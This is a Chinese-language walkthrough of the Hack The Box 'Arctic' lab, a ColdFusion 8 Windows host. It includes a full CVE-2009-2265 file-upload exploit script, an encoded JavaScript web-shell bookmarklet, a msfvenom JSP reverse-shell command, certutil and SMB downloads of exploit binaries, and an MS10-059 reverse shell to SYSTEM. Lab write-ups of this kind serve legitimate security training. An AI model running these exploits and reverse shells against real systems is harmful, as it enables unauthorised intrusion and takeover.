Hackthebox:Arctic Walkthrough

预备知识

使用了msfvenom，不想看的可以跳过

浏览器信息收集尤其是细节发现服务信息不能过度依赖工具

MS10-059、smbserver、jsp reverse shell

信息收集和获取立足点

不知道为什么，最近htb的靶机网络不太稳

先用nmap快速探测下开启端口，这里使用-Pn参数，非ping扫描,不执行主机发现,可以跳过防火墙

nmap -Pn 10.10.10.11

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-08 12:08 CST
Nmap scan report for 10.10.10.11
Host is up (0.29s latency).
Not shown: 997 filtered ports
PORT      STATE SERVICE
135/tcp   open  msrpc
8500/tcp  open  fmtp
49154/tcp open  unknownNmap done: 1 IP address (1 host up) scanned in 20.83 seconds

再开启一个详细扫描，暂时也没什么别的信息，只能看nmap的详细输出了

nmap -sC -sV -Pn -p- 10.10.10.11

PORT      STATE SERVICE VERSION
135/tcp   open  msrpc   Microsoft Windows RPC
8500/tcp  open  fmtp?
49154/tcp open  msrpc   Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

只能访问这几个端口看看有没有web服务了http://10.10.10.11:8500/ http://10.10.10.11:49154/

http://10.10.10.11:8500/上有web服务

看看是不是已知的cmd或者漏洞组件

whatweb -vv http://10.10.10.11:8500/

http://10.10.10.11:8500/ [200]
Identifying: http://10.10.10.11:8500/
HTTP-Status: 200
[["IP", [{:string=>"10.10.10.11", :certainty=>100}]],["Title", [{:name=>"page title", :string=>"Index of /", :certainty=>100}]],["Country", [{:string=>"RESERVED", :module=>"ZZ", :certainty=>100}]],["Index-Of",[{:text=>"<title>Index of /",:regexp_compiled=>/<title>Index\ of\ \//,:certainty=>100}]],["HTTPServer",[{:name=>"server string", :string=>"JRun Web Server", :certainty=>100}]]]WhatWeb report for http://10.10.10.11:8500/
Status    : 200 OK
Title     : Index of /
IP        : 10.10.10.11
Country   : RESERVED, ZZSummary   : Index-Of, HTTPServer[JRun Web Server]Detected Plugins:
[ HTTPServer ]HTTP server header string. This plugin also attempts to identify the operating system from the server header. String       : JRun Web Server (from server string){:name=>"server string", :certainty=>100, :string=>"JRun Web Server"}[ Index-Of ]Index of {:certainty=>100}Google Dorks: (1)HTTP Headers:HTTP/1.0 200 OKDate: Wed, 09 Dec 2020 13:26:00 GMTContent-Type: text/html; charset=utf-8Connection: closeServer: JRun Web Server

信息没什么用，读读文件寻找线索，如http://10.10.10.11:8500/CFIDE/Application.cfm ，看到了如下信息

猜测组件是 ColdFusion，搜索相关漏洞

访问http://10.10.10.11:8500/CFIDE/administrator/发现版本是8

正好有个CVE:2009-2265，搜索很久找到了一个exploit，还是在htb论坛搜到的https://forum.hackthebox.eu/discussion/116/python-coldfusion-8-0-1-arbitrary-file-upload

#!/usr/bin/python
# Exploit Title: ColdFusion 8.0.1 - Arbitrary File Upload
# Date: 2017-10-16
# Exploit Author: Alexander Reid
# Vendor Homepage: http://www.adobe.com/products/ColdFusion-family.html
# Version: ColdFusion 8.0.1
# CVE: CVE-2009-2265
#
# Description:
# A standalone proof of concept that demonstrates an arbitrary file upload vulnerability in ColdFusion 8.0.1
# Uploads the specified jsp file to the remote server.
#
# Usage: ./exploit.py <target ip> <target port> [/path/to/ColdFusion] </path/to/payload.jsp>
# Example: ./exploit.py 127.0.0.1 8500 /home/arrexel/shell.jsp
import requests, sys, ostry:ip = sys.argv[1]port = sys.argv[2]if len(sys.argv) == 5:path = sys.argv[3]filename = os.path.basename(sys.argv[4])with open(sys.argv[4], 'r') as payload:body=payload.read()else:path = ""filename = os.path.basename(sys.argv[3])with open(sys.argv[3], 'r') as payload:body=payload.read()
except IndexError:print 'Usage: ./exploit.py <target ip/hostname> <target port> [/path/to/ColdFusion] </path/to/payload.jsp>'print 'Example: ./exploit.py example.com 8500 /home/arrexel/shell.jsp'sys.exit(-1)basepath = "http://" + ip + ":" + port + pathprint 'Sending payload...'
print 'Base filename is {}'.format(filename)try:req = requests.post(basepath + "/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm?Command=FileUpload&Type=File&CurrentFolder=/{}%00".format(filename),files={ 'newfile': ('sploit.txt', body, 'application/x-java-archive' )})print 'Base path is {}'.format(basepath)if req.status_code == 200:print 'Successfully uploaded payload!\nFind it at {}/userfiles/file/{}'.format(basepath, filename)else:print 'Failed to upload payload... {} {}'.format(str(req.status_code), req.reason)
except requests.Timeout:print 'Failed to upload payload... Request timed out'

看了下使用方式，需要一个jsp马，这里使用kali自带的jsp马/usr/share/webshells/cmdjsp.jsp

python exploit.py 10.10.10.11 8500 /home/bot/shell.jsp

但是失败了，，，，因为实在用不好，然后用一个老外推荐的的这个shell

将以下代码作为链接添加到书签栏，然后在cmd.jsp页面上单击它。

javascript:{window.localStorage.embed=window.atob("ZG9jdW1lbnQud3JpdGUoIjxwPiIpOw0KdmFyIGh0bWwgPSAiPGZvcm0gbWV0aG9kPXBvc3QgYWN0aW9uPSdjbWQuanNwJz5cDQo8aW5wdXQgbmFtZT0nYycgdHlwZT10ZXh0PjxpbnB1dCB0eXBlPXN1Ym1pdCB2YWx1ZT0nUnVuJz5cDQo8L2Zvcm0+PGhyPlwNCjxmb3JtIGFjdGlvbj0nY21kLmpzcCcgbWV0aG9kPXBvc3Q+XA0KVXBsb2FkIGRpcjogPGlucHV0IG5hbWU9J2EnIHR5cGU9dGV4dCB2YWx1ZT0nLic+PGJyPlwNClNlbGVjdCBhIGZpbGUgdG8gdXBsb2FkOiA8aW5wdXQgbmFtZT0nbicgdHlwZT0nZmlsZScgaWQ9J2YnPlwNCjxpbnB1dCB0eXBlPSdoaWRkZW4nIG5hbWU9J2InIGlkPSdiJz5cDQo8aW5wdXQgdHlwZT0nc3VibWl0JyB2YWx1ZT0nVXBsb2FkJz5cDQo8L2Zvcm0+PGhyPiI7DQp2YXIgZGl2ID0gZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgnZGl2Jyk7DQpkaXYuaW5uZXJIVE1MID0gaHRtbDsNCmRvY3VtZW50LmJvZHkuaW5zZXJ0QmVmb3JlKGRpdiwgZG9jdW1lbnQuYm9keS5maXJzdENoaWxkKTsNCg0KdmFyIGhhbmRsZUZpbGVTZWxlY3QgPSBmdW5jdGlvbihldnQpIHsNCiAgICB2YXIgZmlsZXMgPSBldnQudGFyZ2V0LmZpbGVzOw0KICAgIHZhciBmaWxlID0gZmlsZXNbMF07DQoNCiAgICBpZiAoZmlsZXMgJiYgZmlsZSkgew0KICAgICAgICB2YXIgcmVhZGVyID0gbmV3IEZpbGVSZWFkZXIoKTsNCg0KICAgICAgICByZWFkZXIub25sb2FkID0gZnVuY3Rpb24ocmVhZGVyRXZ0KSB7DQogICAgICAgICAgICB2YXIgYmluYXJ5U3RyaW5nID0gcmVhZGVyRXZ0LnRhcmdldC5yZXN1bHQ7DQogICAgICAgICAgICBkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnYicpLnZhbHVlID0gYnRvYShiaW5hcnlTdHJpbmcpOw0KICAgICAgICB9Ow0KDQogICAgICAgIHJlYWRlci5yZWFkQXNCaW5hcnlTdHJpbmcoZmlsZSk7DQogICAgfQ0KfTsNCmlmICh3aW5kb3cuRmlsZSAmJiB3aW5kb3cuRmlsZVJlYWRlciAmJiB3aW5kb3cuRmlsZUxpc3QgJiYgd2luZG93LkJsb2IpIHsNCiAgICBkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnZicpLmFkZEV2ZW50TGlzdGVuZXIoJ2NoYW5nZScsIGhhbmRsZUZpbGVTZWxlY3QsIGZhbHNlKTsNCn0gZWxzZSB7DQogICAgYWxlcnQoJ1RoZSBGaWxlIEFQSXMgYXJlIG5vdCBmdWxseSBzdXBwb3J0ZWQgaW4gdGhpcyBicm93c2VyLicpOw0KfQ==");eval(window.localStorage.embed);};void(0);

然而一直报错，试了好多，都失败了，最后只能用msfvenom生成的的shell

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.4 LPORT=1234 -f raw > hello.jsp

本地起个nc监听，浏览器访问一下即可收到shell

权限提升

还是windows-exploit-suggester

sudo python windows-exploit-suggester.py --database 2020-12-08-mssb.xls --systeminfo Arctic.txt

[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (utf-8)
[*] querying database file for potential vulnerabilities
[*] comparing the 0 hotfix(es) against the 197 potential bulletins(s) with a database of 137 known exploits
[*] there are now 197 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2008 R2 64-bit'
[*]
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*]   http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*]   http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*]
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
[*] done

certutil -urlcache -f http://10.10.14.4/JuicyPotato.exe JuicyPotato.exe不过下载失败了，所以只能用smbserver下载了

本地作为smbserver执行

sudo smbserver.py share `pwd`

最后用的是MS10-059，这个是编译好的版本

net use \\10.10.14.4\share
copy \\10.10.14.4\share\MS10-059.exe

先在本机nc监听一个端口5555

shell执行MS10-059.exe 10.10.14.4 5555

10.10.10.11: inverse host lookup failed: Unknown host
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.11] 50197
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.C:\ColdFusion8\runtime\bin>whoami
whoami
nt authority\systemC:\ColdFusion8\runtime\bin>

下面是失败的提权过程

回到之前的shell

net use \\10.10.14.4\share
copy \\10.10.14.4\share\JuicyPotato.exe

执行JuicyPotato.exe，不过下面失败

JuicyPotato.exe -z -l !port! -c %%i >> result.log
JuicyPotato.exe -t t -p c:\windows\system32\cmd.exe -l 1337 -c {03e15b2e-cca6-451c-8fb0-1e2ee37a27dd}